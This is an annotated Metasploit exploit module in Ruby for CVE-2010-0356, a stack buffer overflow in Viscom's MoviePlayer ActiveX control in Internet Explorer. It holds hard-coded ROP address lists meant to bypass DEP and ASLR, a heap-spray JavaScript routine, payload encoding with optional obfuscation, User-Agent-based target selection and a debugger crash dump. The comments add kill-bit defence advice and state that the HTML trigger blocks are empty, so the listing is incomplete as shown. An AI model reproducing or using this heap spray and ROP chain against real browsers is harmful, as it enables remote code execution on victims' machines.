require 'msf/core'
# Metasploit browser-exploit module for CVE-2010-0356 (OSVDB 61634): a stack-based
# buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control shipped as
# MoviePlayer.ocx 6.8.0.0 with Viscom Software Movie Player Pro SDK ActiveX 6.8.
# Written in the legacy `Metasploit3` class style of older framework releases.
#
# Defender notes: the HTML served by on_request_uri instantiates the control purely by
# the CLSID literal in the <object> tag, so a kill bit (Compatibility Flags) for that
# CLSID, or blocking the control through ActiveX policy, stops the page before the
# vulnerable DrawText method can be reached. Per the description, the control only
# loads once the victim has trusted the publisher Viscom Software.
class Metasploit3 < Msf::Exploit::Remote
# Reliability ranking declared by the module authors.
Rank = NormalRanking
# Supplies the HTTP server plumbing and the HTML/JS helpers used below
# (heaplib, send_response_html, rand_text_alpha come from this mixin or its parents).
include Msf::Exploit::Remote::HttpServer::HTML
# Registers module metadata (name, references, payload constraints, targets) with the
# framework and adds the OBFUSCATE option. Target 0 ('Automatic') is the default and is
# resolved per request in on_request_uri from the User-Agent header.
#
# @param info [Hash] metadata overrides merged in by update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',
'Description'=> %q{
Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control
in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows
remote attackers to execute arbitrary code via a long strFontName parameter to the
DrawText method.
The victim will first be required to trust the publisher Viscom Software.
This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
with Java support.
},
'License'=> MSF_LICENSE,
'Author' =>
[
'shinnai',
'TecR0c',
'mr_me'
],
# Legacy SVN keyword; never expanded in git-hosted copies of the module.
'Version'=> '$Revision: $',
'References' =>
[
[ 'CVE', '2010-0356' ],
[ 'OSVDB', '61634' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
# Runs `migrate -f` automatically on each new session.
'InitialAutoRunScript' => 'migrate -f'
},
'Payload'=>
{
'Space'=> 1024,
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets'=>
[
# Index 0: resolved from the User-Agent in on_request_uri.
[ 'Automatic', {} ],
# Index 1: plain payload, pivot address appended (else-branch in on_request_uri).
[ 'Windows IE6-7', {} ],
# Index 2: hard-coded address lists wrapped around the payload (IE8 branch).
[ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
],
'DisclosureDate' => 'Jan 12 2010',
'DefaultTarget'=> 0))
# OBFUSCATE (default true) runs the generated script through Rex::Exploitation::JSObfu.
register_options(
[ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
end
# Returns false; by framework convention this keeps the module out of automatic
# module selection (e.g. browser-autopwn style filtering) — confirm against the
# framework version in use.
def autofilter
false
end
# Declares the zlib dependency (presumably for compressed HTTP responses — confirm
# in the HttpServer mixin).
def check_dependencies
use_zlib
end
# Produces a random 32-bit filler value: +n+ random alphabetic bytes reinterpreted as a
# native-endian unsigned long. Used for the padding slots in the packed address list
# built by on_request_uri.
#
# NOTE: for n < 4, unpack("L") yields nil and `to_i` silently turns that into 0 instead
# of raising. "L" is native-endian while the address lists are packed with "V"
# (little-endian); the two agree on little-endian hosts.
#
# @param n [Integer] number of random bytes to draw (default 4)
# @return [Integer] unsigned 32-bit value (0 when fewer than 4 bytes were drawn)
def junk(n=4)
return rand_text_alpha(n).unpack("L")[0].to_i
end
# Handles each request for the module's URI: selects the target, builds the target-
# specific address data and the encoded payload, wraps the payload in a heap-spray
# script and answers with an HTML page that instantiates the vulnerable control by CLSID.
#
# @param cli [Rex::Socket] client connection; peerhost/peerport are used for logging
# @param request [Rex::Proto::Http::Request] incoming request; only the User-Agent
#   header is read
#
# NOTE(review): as listed, the <script> blocks in +html+ are empty and the first one is
# never closed — +sploit+, +js+ (the spray), +vname+ and +strname+ are computed but never
# referenced by the HTML, so this listing does not deliver them. The trigger portion
# appears to have been stripped from the source page; nothing here reconstructs it.
def on_request_uri(cli, request)
my_target = target
# 'Automatic' picks the target from the User-Agent. A request that matches none of the
# branches (including a missing User-Agent, where +agent+ is nil) keeps the 'Automatic'
# target, which fails the /IE8/ test below and is therefore served the IE6-7 variant.
if my_target.name == 'Automatic'
agent = request.headers['User-Agent']
# `and` is used where `&&` is idiomatic; harmless here since each operand is a bare
# match expression.
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
my_target = targets[1]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
end
end
# 32 random alphabetic bytes; the target-specific address data is appended below.
sploit = rand_text_alpha(32)
# Hard-coded address shared by both target branches.
pivot_addr = 0x1126cfe4
if my_target.name =~ /IE8/
# IE8 target: a list of fixed addresses and junk fillers, packed little-endian, is
# appended to +sploit+, and a second fixed address list is prepended to the payload.
# All literals are tied to the library versions the authors tested ("JAVA 6" in the
# target name) and are not derived at runtime.
pivot_rop =
[
0x10015201,
pivot_addr,
0x10014361,
junk,
junk,
junk,
junk,
junk,
0x1001c049,
].pack("V*")
sploit << pivot_rop
code = [0x7C347F98].pack("V") * 4
code <<
[
0x7C37653D,
0xFFFFFDFF,
0x7C347F98,
0x7C3415A2,
0xFFFFFFFF,
0x7C376402,
0x7C351E05,
0x7C345255,
0x7C352174,
0x7C344F87,
0xFFFFFFC0,
0x7C351EB1,
0x7C34D201,
0x7C38B001,
0x7C347F97,
0x7C37A151,
0x7C378C81,
0x7C345C30,
].pack("V*")
code << payload.encoded
else
# Other targets: encoded payload only, with pivot_addr appended to +sploit+.
code = payload.encoded
sploit << [pivot_addr].pack('V*')
end
# Convert the raw bytes to the %uXXXX form that JavaScript unescape() decodes.
code = Rex::Text.to_unescape(code)
# Heap-spray script: 0x200 allocations of a block made of a 0x0c0c-filled sled with the
# code embedded at a fixed offset. Relies on a heapLib.ie object defined elsewhere.
spray = <<-JS
var heap_lib = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x800-0x20);
var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x7fb00-6)/2);
heap_lib.gc();
for (var i = 0; i < 0x200; i++) {
heap_lib.alloc(block);
}
JS
# heaplib() presumably prepends the heapLib implementation the script refers to
# (provided by the HttpServer::HTML mixin — confirm in the framework version in use).
js = heaplib(spray)
# Optional JavaScript obfuscation; OBFUSCATE defaults to true.
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
# Randomised identifiers of 1..100 alphabetic characters; only +vname+ appears in
# the HTML as listed.
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# The <object> tag loads the control by CLSID; see the NOTE(review) above about the
# empty, unclosed script blocks.
html = %Q|<html>
<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>
<script>
<script language='vbscript'>
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
end
end
=begin
(78c.1d8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4
eip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
41414141 ?????
0:005> dd @esp
0203f300 41414141 41414141 41414141 41414141
0203f310 41414141 41414141 41414141 41414141
0203f320 41414141 41414141 41414141 41414141
0203f330 41414141 41414141 41414141 41414141
0203f340 41414141 41414141 41414141 41414141
0203f350 41414141 41414141 41414141 41414141
0203f360 41414141 41414141 41414141 41414141
0203f370 41414141 41414141 41414141 41414141
=end